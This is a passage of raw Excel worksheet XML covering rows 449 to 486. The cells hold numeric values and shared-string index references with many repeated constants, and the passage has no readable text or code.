      <c r="L449" s="11"/>
      <c r="M449" s="11"/>
      <c r="N449" s="11" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="450" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A450" s="3">
        <v>449</v>
      </c>
      <c r="B450" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C450" s="14" t="s">
        <v>1031</v>
      </c>
      <c r="D450" s="6">
        <v>1</v>
      </c>
      <c r="E450" s="6">
        <v>404</v>
      </c>
      <c r="F450" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G450" s="6">
        <v>530</v>
      </c>
      <c r="H450" s="6">
        <v>467</v>
      </c>
      <c r="I450" s="6">
        <v>0</v>
      </c>
      <c r="J450" s="6">
        <v>331</v>
      </c>
      <c r="K450" s="6">
        <v>69134</v>
      </c>
      <c r="L450" s="11"/>
      <c r="M450" s="11"/>
      <c r="N450" s="11" t="s">
        <v>1032</v>
      </c>
    </row>
    <row r="451" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A451" s="3">
        <v>450</v>
      </c>
      <c r="B451" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C451" s="14" t="s">
        <v>1033</v>
      </c>
      <c r="D451" s="6">
        <v>1</v>
      </c>
      <c r="E451" s="6">
        <v>404</v>
      </c>
      <c r="F451" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G451" s="6">
        <v>514</v>
      </c>
      <c r="H451" s="6">
        <v>476</v>
      </c>
      <c r="I451" s="6">
        <v>0</v>
      </c>
      <c r="J451" s="6">
        <v>331</v>
      </c>
      <c r="K451" s="6">
        <v>69134</v>
      </c>
      <c r="L451" s="11"/>
      <c r="M451" s="11"/>
      <c r="N451" s="11" t="s">
        <v>1034</v>
      </c>
    </row>
    <row r="452" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A452" s="3">
        <v>451</v>
      </c>
      <c r="B452" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C452" s="14" t="s">
        <v>1035</v>
      </c>
      <c r="D452" s="6">
        <v>1</v>
      </c>
      <c r="E452" s="6">
        <v>404</v>
      </c>
      <c r="F452" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G452" s="6">
        <v>511</v>
      </c>
      <c r="H452" s="6">
        <v>486</v>
      </c>
      <c r="I452" s="6">
        <v>0</v>
      </c>
      <c r="J452" s="6">
        <v>331</v>
      </c>
      <c r="K452" s="6">
        <v>69134</v>
      </c>
      <c r="L452" s="11"/>
      <c r="M452" s="11"/>
      <c r="N452" s="11" t="s">
        <v>1036</v>
      </c>
    </row>
    <row r="453" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A453" s="3">
        <v>452</v>
      </c>
      <c r="B453" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C453" s="14" t="s">
        <v>1037</v>
      </c>
      <c r="D453" s="6">
        <v>1</v>
      </c>
      <c r="E453" s="6">
        <v>404</v>
      </c>
      <c r="F453" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G453" s="6">
        <v>504</v>
      </c>
      <c r="H453" s="6">
        <v>495</v>
      </c>
      <c r="I453" s="6">
        <v>0</v>
      </c>
      <c r="J453" s="6">
        <v>331</v>
      </c>
      <c r="K453" s="6">
        <v>69134</v>
      </c>
      <c r="L453" s="11"/>
      <c r="M453" s="11"/>
      <c r="N453" s="11" t="s">
        <v>1038</v>
      </c>
    </row>
    <row r="454" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A454" s="3">
        <v>453</v>
      </c>
      <c r="B454" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C454" s="14" t="s">
        <v>1039</v>
      </c>
      <c r="D454" s="6">
        <v>1</v>
      </c>
      <c r="E454" s="6">
        <v>404</v>
      </c>
      <c r="F454" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G454" s="6">
        <v>560</v>
      </c>
      <c r="H454" s="6">
        <v>504</v>
      </c>
      <c r="I454" s="6">
        <v>0</v>
      </c>
      <c r="J454" s="6">
        <v>331</v>
      </c>
      <c r="K454" s="6">
        <v>69134</v>
      </c>
      <c r="L454" s="11"/>
      <c r="M454" s="11"/>
      <c r="N454" s="11" t="s">
        <v>1040</v>
      </c>
    </row>
    <row r="455" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A455" s="3">
        <v>454</v>
      </c>
      <c r="B455" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C455" s="14" t="s">
        <v>1041</v>
      </c>
      <c r="D455" s="6">
        <v>1</v>
      </c>
      <c r="E455" s="6">
        <v>404</v>
      </c>
      <c r="F455" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G455" s="6">
        <v>591</v>
      </c>
      <c r="H455" s="6">
        <v>514</v>
      </c>
      <c r="I455" s="6">
        <v>0</v>
      </c>
      <c r="J455" s="6">
        <v>331</v>
      </c>
      <c r="K455" s="6">
        <v>69134</v>
      </c>
      <c r="L455" s="11"/>
      <c r="M455" s="11"/>
      <c r="N455" s="11" t="s">
        <v>1042</v>
      </c>
    </row>
    <row r="456" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A456" s="3">
        <v>455</v>
      </c>
      <c r="B456" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C456" s="14" t="s">
        <v>1044</v>
      </c>
      <c r="D456" s="6">
        <v>1</v>
      </c>
      <c r="E456" s="6">
        <v>404</v>
      </c>
      <c r="F456" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G456" s="6">
        <v>621</v>
      </c>
      <c r="H456" s="6">
        <v>524</v>
      </c>
      <c r="I456" s="6">
        <v>0</v>
      </c>
      <c r="J456" s="6">
        <v>331</v>
      </c>
      <c r="K456" s="6">
        <v>69134</v>
      </c>
      <c r="L456" s="11"/>
      <c r="M456" s="11"/>
      <c r="N456" s="11" t="s">
        <v>1045</v>
      </c>
    </row>
    <row r="457" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A457" s="3">
        <v>456</v>
      </c>
      <c r="B457" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C457" s="14" t="s">
        <v>1046</v>
      </c>
      <c r="D457" s="6">
        <v>1</v>
      </c>
      <c r="E457" s="6">
        <v>404</v>
      </c>
      <c r="F457" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G457" s="6">
        <v>643</v>
      </c>
      <c r="H457" s="6">
        <v>534</v>
      </c>
      <c r="I457" s="6">
        <v>0</v>
      </c>
      <c r="J457" s="6">
        <v>331</v>
      </c>
      <c r="K457" s="6">
        <v>69134</v>
      </c>
      <c r="L457" s="11"/>
      <c r="M457" s="11"/>
      <c r="N457" s="11" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="458" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A458" s="3">
        <v>457</v>
      </c>
      <c r="B458" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C458" s="14" t="s">
        <v>1048</v>
      </c>
      <c r="D458" s="6">
        <v>1</v>
      </c>
      <c r="E458" s="6">
        <v>404</v>
      </c>
      <c r="F458" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G458" s="6">
        <v>658</v>
      </c>
      <c r="H458" s="6">
        <v>544</v>
      </c>
      <c r="I458" s="6">
        <v>0</v>
      </c>
      <c r="J458" s="6">
        <v>331</v>
      </c>
      <c r="K458" s="6">
        <v>69134</v>
      </c>
      <c r="L458" s="11"/>
      <c r="M458" s="11"/>
      <c r="N458" s="11" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="459" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A459" s="3">
        <v>458</v>
      </c>
      <c r="B459" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C459" s="14" t="s">
        <v>1050</v>
      </c>
      <c r="D459" s="6">
        <v>1</v>
      </c>
      <c r="E459" s="6">
        <v>404</v>
      </c>
      <c r="F459" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G459" s="6">
        <v>637</v>
      </c>
      <c r="H459" s="6">
        <v>554</v>
      </c>
      <c r="I459" s="6">
        <v>0</v>
      </c>
      <c r="J459" s="6">
        <v>331</v>
      </c>
      <c r="K459" s="6">
        <v>69134</v>
      </c>
      <c r="L459" s="11"/>
      <c r="M459" s="11"/>
      <c r="N459" s="11" t="s">
        <v>1051</v>
      </c>
    </row>
    <row r="460" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A460" s="3">
        <v>459</v>
      </c>
      <c r="B460" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C460" s="14" t="s">
        <v>1052</v>
      </c>
      <c r="D460" s="6">
        <v>1</v>
      </c>
      <c r="E460" s="6">
        <v>404</v>
      </c>
      <c r="F460" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G460" s="6">
        <v>648</v>
      </c>
      <c r="H460" s="6">
        <v>355</v>
      </c>
      <c r="I460" s="6">
        <v>0</v>
      </c>
      <c r="J460" s="6">
        <v>331</v>
      </c>
      <c r="K460" s="6">
        <v>69134</v>
      </c>
      <c r="L460" s="11"/>
      <c r="M460" s="11"/>
      <c r="N460" s="11" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="461" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A461" s="3">
        <v>460</v>
      </c>
      <c r="B461" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C461" s="14" t="s">
        <v>1054</v>
      </c>
      <c r="D461" s="6">
        <v>1</v>
      </c>
      <c r="E461" s="6">
        <v>404</v>
      </c>
      <c r="F461" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G461" s="6">
        <v>620</v>
      </c>
      <c r="H461" s="6">
        <v>382</v>
      </c>
      <c r="I461" s="6">
        <v>0</v>
      </c>
      <c r="J461" s="6">
        <v>331</v>
      </c>
      <c r="K461" s="6">
        <v>69134</v>
      </c>
      <c r="L461" s="11"/>
      <c r="M461" s="11"/>
      <c r="N461" s="11" t="s">
        <v>1055</v>
      </c>
    </row>
    <row r="462" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A462" s="3">
        <v>461</v>
      </c>
      <c r="B462" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C462" s="14" t="s">
        <v>1056</v>
      </c>
      <c r="D462" s="6">
        <v>1</v>
      </c>
      <c r="E462" s="6">
        <v>404</v>
      </c>
      <c r="F462" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G462" s="6">
        <v>601</v>
      </c>
      <c r="H462" s="6">
        <v>391</v>
      </c>
      <c r="I462" s="6">
        <v>0</v>
      </c>
      <c r="J462" s="6">
        <v>331</v>
      </c>
      <c r="K462" s="6">
        <v>69134</v>
      </c>
      <c r="L462" s="11"/>
      <c r="M462" s="11"/>
      <c r="N462" s="11" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="463" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A463" s="3">
        <v>462</v>
      </c>
      <c r="B463" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C463" s="14" t="s">
        <v>1058</v>
      </c>
      <c r="D463" s="6">
        <v>1</v>
      </c>
      <c r="E463" s="6">
        <v>404</v>
      </c>
      <c r="F463" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G463" s="6">
        <v>585</v>
      </c>
      <c r="H463" s="6">
        <v>400</v>
      </c>
      <c r="I463" s="6">
        <v>0</v>
      </c>
      <c r="J463" s="6">
        <v>331</v>
      </c>
      <c r="K463" s="6">
        <v>69134</v>
      </c>
      <c r="L463" s="11"/>
      <c r="M463" s="11"/>
      <c r="N463" s="11" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="464" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A464" s="3">
        <v>463</v>
      </c>
      <c r="B464" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C464" s="14" t="s">
        <v>1061</v>
      </c>
      <c r="D464" s="6">
        <v>1</v>
      </c>
      <c r="E464" s="6">
        <v>404</v>
      </c>
      <c r="F464" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G464" s="6">
        <v>547</v>
      </c>
      <c r="H464" s="6">
        <v>409</v>
      </c>
      <c r="I464" s="6">
        <v>0</v>
      </c>
      <c r="J464" s="6">
        <v>331</v>
      </c>
      <c r="K464" s="6">
        <v>69134</v>
      </c>
      <c r="L464" s="11"/>
      <c r="M464" s="11"/>
      <c r="N464" s="11" t="s">
        <v>1062</v>
      </c>
    </row>
    <row r="465" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A465" s="3">
        <v>464</v>
      </c>
      <c r="B465" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C465" s="14" t="s">
        <v>1063</v>
      </c>
      <c r="D465" s="6">
        <v>1</v>
      </c>
      <c r="E465" s="6">
        <v>404</v>
      </c>
      <c r="F465" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G465" s="6">
        <v>497</v>
      </c>
      <c r="H465" s="6">
        <v>418</v>
      </c>
      <c r="I465" s="6">
        <v>0</v>
      </c>
      <c r="J465" s="6">
        <v>331</v>
      </c>
      <c r="K465" s="6">
        <v>69134</v>
      </c>
      <c r="L465" s="11"/>
      <c r="M465" s="11"/>
      <c r="N465" s="11" t="s">
        <v>1064</v>
      </c>
    </row>
    <row r="466" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A466" s="3">
        <v>465</v>
      </c>
      <c r="B466" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C466" s="14" t="s">
        <v>1065</v>
      </c>
      <c r="D466" s="6">
        <v>1</v>
      </c>
      <c r="E466" s="6">
        <v>404</v>
      </c>
      <c r="F466" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G466" s="6">
        <v>493</v>
      </c>
      <c r="H466" s="6">
        <v>427</v>
      </c>
      <c r="I466" s="6">
        <v>0</v>
      </c>
      <c r="J466" s="6">
        <v>331</v>
      </c>
      <c r="K466" s="6">
        <v>69134</v>
      </c>
      <c r="L466" s="11"/>
      <c r="M466" s="11"/>
      <c r="N466" s="11" t="s">
        <v>1066</v>
      </c>
    </row>
    <row r="467" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A467" s="3">
        <v>466</v>
      </c>
      <c r="B467" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C467" s="14" t="s">
        <v>1067</v>
      </c>
      <c r="D467" s="6">
        <v>1</v>
      </c>
      <c r="E467" s="6">
        <v>404</v>
      </c>
      <c r="F467" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G467" s="6">
        <v>479</v>
      </c>
      <c r="H467" s="6">
        <v>436</v>
      </c>
      <c r="I467" s="6">
        <v>0</v>
      </c>
      <c r="J467" s="6">
        <v>331</v>
      </c>
      <c r="K467" s="6">
        <v>69134</v>
      </c>
      <c r="L467" s="11"/>
      <c r="M467" s="11"/>
      <c r="N467" s="11" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="468" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A468" s="3">
        <v>467</v>
      </c>
      <c r="B468" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C468" s="14" t="s">
        <v>1069</v>
      </c>
      <c r="D468" s="6">
        <v>1</v>
      </c>
      <c r="E468" s="6">
        <v>404</v>
      </c>
      <c r="F468" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G468" s="6">
        <v>494</v>
      </c>
      <c r="H468" s="6">
        <v>446</v>
      </c>
      <c r="I468" s="6">
        <v>0</v>
      </c>
      <c r="J468" s="6">
        <v>331</v>
      </c>
      <c r="K468" s="6">
        <v>69134</v>
      </c>
      <c r="L468" s="11"/>
      <c r="M468" s="11"/>
      <c r="N468" s="11" t="s">
        <v>1070</v>
      </c>
    </row>
    <row r="469" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A469" s="3">
        <v>468</v>
      </c>
      <c r="B469" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C469" s="14" t="s">
        <v>1071</v>
      </c>
      <c r="D469" s="6">
        <v>1</v>
      </c>
      <c r="E469" s="6">
        <v>404</v>
      </c>
      <c r="F469" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G469" s="6">
        <v>507</v>
      </c>
      <c r="H469" s="6">
        <v>456</v>
      </c>
      <c r="I469" s="6">
        <v>0</v>
      </c>
      <c r="J469" s="6">
        <v>331</v>
      </c>
      <c r="K469" s="6">
        <v>69134</v>
      </c>
      <c r="L469" s="11"/>
      <c r="M469" s="11"/>
      <c r="N469" s="11" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="470" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A470" s="3">
        <v>469</v>
      </c>
      <c r="B470" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C470" s="14" t="s">
        <v>1073</v>
      </c>
      <c r="D470" s="6">
        <v>1</v>
      </c>
      <c r="E470" s="6">
        <v>404</v>
      </c>
      <c r="F470" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G470" s="6">
        <v>557</v>
      </c>
      <c r="H470" s="6">
        <v>465</v>
      </c>
      <c r="I470" s="6">
        <v>0</v>
      </c>
      <c r="J470" s="6">
        <v>331</v>
      </c>
      <c r="K470" s="6">
        <v>69134</v>
      </c>
      <c r="L470" s="11"/>
      <c r="M470" s="11"/>
      <c r="N470" s="11" t="s">
        <v>1074</v>
      </c>
    </row>
    <row r="471" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A471" s="3">
        <v>470</v>
      </c>
      <c r="B471" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C471" s="14" t="s">
        <v>1075</v>
      </c>
      <c r="D471" s="6">
        <v>1</v>
      </c>
      <c r="E471" s="6">
        <v>404</v>
      </c>
      <c r="F471" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G471" s="6">
        <v>653</v>
      </c>
      <c r="H471" s="6">
        <v>474</v>
      </c>
      <c r="I471" s="6">
        <v>0</v>
      </c>
      <c r="J471" s="6">
        <v>331</v>
      </c>
      <c r="K471" s="6">
        <v>69134</v>
      </c>
      <c r="L471" s="11"/>
      <c r="M471" s="11"/>
      <c r="N471" s="11" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="472" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A472" s="3">
        <v>471</v>
      </c>
      <c r="B472" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C472" s="14" t="s">
        <v>1077</v>
      </c>
      <c r="D472" s="6">
        <v>1</v>
      </c>
      <c r="E472" s="6">
        <v>404</v>
      </c>
      <c r="F472" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G472" s="6">
        <v>660</v>
      </c>
      <c r="H472" s="6">
        <v>484</v>
      </c>
      <c r="I472" s="6">
        <v>0</v>
      </c>
      <c r="J472" s="6">
        <v>331</v>
      </c>
      <c r="K472" s="6">
        <v>69134</v>
      </c>
      <c r="L472" s="11"/>
      <c r="M472" s="11"/>
      <c r="N472" s="11" t="s">
        <v>1078</v>
      </c>
    </row>
    <row r="473" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A473" s="3">
        <v>472</v>
      </c>
      <c r="B473" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C473" s="14" t="s">
        <v>1080</v>
      </c>
      <c r="D473" s="6">
        <v>1</v>
      </c>
      <c r="E473" s="6">
        <v>404</v>
      </c>
      <c r="F473" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G473" s="6">
        <v>658</v>
      </c>
      <c r="H473" s="6">
        <v>493</v>
      </c>
      <c r="I473" s="6">
        <v>0</v>
      </c>
      <c r="J473" s="6">
        <v>331</v>
      </c>
      <c r="K473" s="6">
        <v>69134</v>
      </c>
      <c r="L473" s="11"/>
      <c r="M473" s="11"/>
      <c r="N473" s="11" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="474" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A474" s="3">
        <v>473</v>
      </c>
      <c r="B474" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C474" s="14" t="s">
        <v>1082</v>
      </c>
      <c r="D474" s="6">
        <v>1</v>
      </c>
      <c r="E474" s="6">
        <v>404</v>
      </c>
      <c r="F474" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G474" s="6">
        <v>669</v>
      </c>
      <c r="H474" s="6">
        <v>502</v>
      </c>
      <c r="I474" s="6">
        <v>0</v>
      </c>
      <c r="J474" s="6">
        <v>331</v>
      </c>
      <c r="K474" s="6">
        <v>69134</v>
      </c>
      <c r="L474" s="11"/>
      <c r="M474" s="11"/>
      <c r="N474" s="11" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="475" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A475" s="3">
        <v>474</v>
      </c>
      <c r="B475" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C475" s="14" t="s">
        <v>1084</v>
      </c>
      <c r="D475" s="6">
        <v>1</v>
      </c>
      <c r="E475" s="6">
        <v>404</v>
      </c>
      <c r="F475" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G475" s="6">
        <v>682</v>
      </c>
      <c r="H475" s="6">
        <v>512</v>
      </c>
      <c r="I475" s="6">
        <v>0</v>
      </c>
      <c r="J475" s="6">
        <v>331</v>
      </c>
      <c r="K475" s="6">
        <v>69134</v>
      </c>
      <c r="L475" s="11"/>
      <c r="M475" s="11"/>
      <c r="N475" s="11" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="476" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A476" s="3">
        <v>475</v>
      </c>
      <c r="B476" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C476" s="14" t="s">
        <v>1086</v>
      </c>
      <c r="D476" s="6">
        <v>1</v>
      </c>
      <c r="E476" s="6">
        <v>404</v>
      </c>
      <c r="F476" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G476" s="6">
        <v>661</v>
      </c>
      <c r="H476" s="6">
        <v>522</v>
      </c>
      <c r="I476" s="6">
        <v>0</v>
      </c>
      <c r="J476" s="6">
        <v>331</v>
      </c>
      <c r="K476" s="6">
        <v>69134</v>
      </c>
      <c r="L476" s="11"/>
      <c r="M476" s="11"/>
      <c r="N476" s="11" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="477" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A477" s="3">
        <v>476</v>
      </c>
      <c r="B477" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C477" s="14" t="s">
        <v>1088</v>
      </c>
      <c r="D477" s="6">
        <v>1</v>
      </c>
      <c r="E477" s="6">
        <v>404</v>
      </c>
      <c r="F477" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G477" s="6">
        <v>731</v>
      </c>
      <c r="H477" s="6">
        <v>532</v>
      </c>
      <c r="I477" s="6">
        <v>0</v>
      </c>
      <c r="J477" s="6">
        <v>331</v>
      </c>
      <c r="K477" s="6">
        <v>69134</v>
      </c>
      <c r="L477" s="11"/>
      <c r="M477" s="11"/>
      <c r="N477" s="11" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="478" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A478" s="3">
        <v>477</v>
      </c>
      <c r="B478" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C478" s="14" t="s">
        <v>1090</v>
      </c>
      <c r="D478" s="6">
        <v>1</v>
      </c>
      <c r="E478" s="6">
        <v>404</v>
      </c>
      <c r="F478" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G478" s="6">
        <v>773</v>
      </c>
      <c r="H478" s="6">
        <v>542</v>
      </c>
      <c r="I478" s="6">
        <v>0</v>
      </c>
      <c r="J478" s="6">
        <v>331</v>
      </c>
      <c r="K478" s="6">
        <v>69134</v>
      </c>
      <c r="L478" s="11"/>
      <c r="M478" s="11"/>
      <c r="N478" s="11" t="s">
        <v>1091</v>
      </c>
    </row>
    <row r="479" spans="1:14" ht="51" x14ac:dyDescent="0.2">
      <c r="A479" s="3">
        <v>478</v>
      </c>
      <c r="B479" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C479" s="14" t="s">
        <v>1092</v>
      </c>
      <c r="D479" s="6">
        <v>1</v>
      </c>
      <c r="E479" s="6">
        <v>404</v>
      </c>
      <c r="F479" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G479" s="6">
        <v>772</v>
      </c>
      <c r="H479" s="6">
        <v>552</v>
      </c>
      <c r="I479" s="6">
        <v>0</v>
      </c>
      <c r="J479" s="6">
        <v>331</v>
      </c>
      <c r="K479" s="6">
        <v>69134</v>
      </c>
      <c r="L479" s="11"/>
      <c r="M479" s="11"/>
      <c r="N479" s="11" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="480" spans="1:14" ht="17" x14ac:dyDescent="0.2">
      <c r="A480" s="3">
        <v>479</v>
      </c>
      <c r="B480" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C480" s="14" t="s">
        <v>1094</v>
      </c>
      <c r="D480" s="6">
        <v>1</v>
      </c>
      <c r="E480" s="6">
        <v>404</v>
      </c>
      <c r="F480" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G480" s="6">
        <v>711</v>
      </c>
      <c r="H480" s="6">
        <v>355</v>
      </c>
      <c r="I480" s="6">
        <v>0</v>
      </c>
      <c r="J480" s="6">
        <v>331</v>
      </c>
      <c r="K480" s="6">
        <v>69134</v>
      </c>
      <c r="L480" s="11"/>
      <c r="M480" s="11"/>
      <c r="N480" s="11" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="481" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A481" s="3">
        <v>480</v>
      </c>
      <c r="B481" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C481" s="14" t="s">
        <v>1097</v>
      </c>
      <c r="D481" s="6">
        <v>1</v>
      </c>
      <c r="E481" s="6">
        <v>404</v>
      </c>
      <c r="F481" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G481" s="6">
        <v>645</v>
      </c>
      <c r="H481" s="6">
        <v>379</v>
      </c>
      <c r="I481" s="6">
        <v>0</v>
      </c>
      <c r="J481" s="6">
        <v>331</v>
      </c>
      <c r="K481" s="6">
        <v>69134</v>
      </c>
      <c r="L481" s="11"/>
      <c r="M481" s="11"/>
      <c r="N481" s="11" t="s">
        <v>1098</v>
      </c>
    </row>
    <row r="482" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A482" s="3">
        <v>481</v>
      </c>
      <c r="B482" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C482" s="14" t="s">
        <v>1099</v>
      </c>
      <c r="D482" s="6">
        <v>1</v>
      </c>
      <c r="E482" s="6">
        <v>404</v>
      </c>
      <c r="F482" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G482" s="6">
        <v>563</v>
      </c>
      <c r="H482" s="6">
        <v>388</v>
      </c>
      <c r="I482" s="6">
        <v>0</v>
      </c>
      <c r="J482" s="6">
        <v>331</v>
      </c>
      <c r="K482" s="6">
        <v>69134</v>
      </c>
      <c r="L482" s="11"/>
      <c r="M482" s="11"/>
      <c r="N482" s="11" t="s">
        <v>1100</v>
      </c>
    </row>
    <row r="483" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A483" s="3">
        <v>482</v>
      </c>
      <c r="B483" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C483" s="14" t="s">
        <v>1101</v>
      </c>
      <c r="D483" s="6">
        <v>1</v>
      </c>
      <c r="E483" s="6">
        <v>404</v>
      </c>
      <c r="F483" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G483" s="6">
        <v>520</v>
      </c>
      <c r="H483" s="6">
        <v>397</v>
      </c>
      <c r="I483" s="6">
        <v>0</v>
      </c>
      <c r="J483" s="6">
        <v>331</v>
      </c>
      <c r="K483" s="6">
        <v>69134</v>
      </c>
      <c r="L483" s="11"/>
      <c r="M483" s="11"/>
      <c r="N483" s="11" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="484" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A484" s="3">
        <v>483</v>
      </c>
      <c r="B484" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C484" s="14" t="s">
        <v>1103</v>
      </c>
      <c r="D484" s="6">
        <v>1</v>
      </c>
      <c r="E484" s="6">
        <v>404</v>
      </c>
      <c r="F484" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G484" s="6">
        <v>498</v>
      </c>
      <c r="H484" s="6">
        <v>406</v>
      </c>
      <c r="I484" s="6">
        <v>0</v>
      </c>
      <c r="J484" s="6">
        <v>331</v>
      </c>
      <c r="K484" s="6">
        <v>69134</v>
      </c>
      <c r="L484" s="11"/>
      <c r="M484" s="11"/>
      <c r="N484" s="11" t="s">
        <v>1104</v>
      </c>
    </row>
    <row r="485" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A485" s="3">
        <v>484</v>
      </c>
      <c r="B485" s="11" t="s">
        <v>18</v>
      </c>
      <c r="C485" s="14" t="s">
        <v>1105</v>
      </c>
      <c r="D485" s="6">
        <v>1</v>
      </c>
      <c r="E485" s="6">
        <v>404</v>
      </c>
      <c r="F485" s="11" t="s">
        <v>383</v>
      </c>
      <c r="G485" s="6">
        <v>506</v>
      </c>
      <c r="H485" s="6">
        <v>415</v>
      </c>
      <c r="I485" s="6">
        <v>0</v>
      </c>
      <c r="J485" s="6">
        <v>331</v>
      </c>
      <c r="K485" s="6">
        <v>69134</v>
      </c>
      <c r="L485" s="11"/>
      <c r="M485" s="11"/>
      <c r="N485" s="11" t="s">
        <v>1106</v>
      </c>
    </row>
    <row r="486" spans="1:14" ht="34" x14ac:dyDescent="0.2">
      <c r="A486" s="3">
        <v>485</v>
      </c>
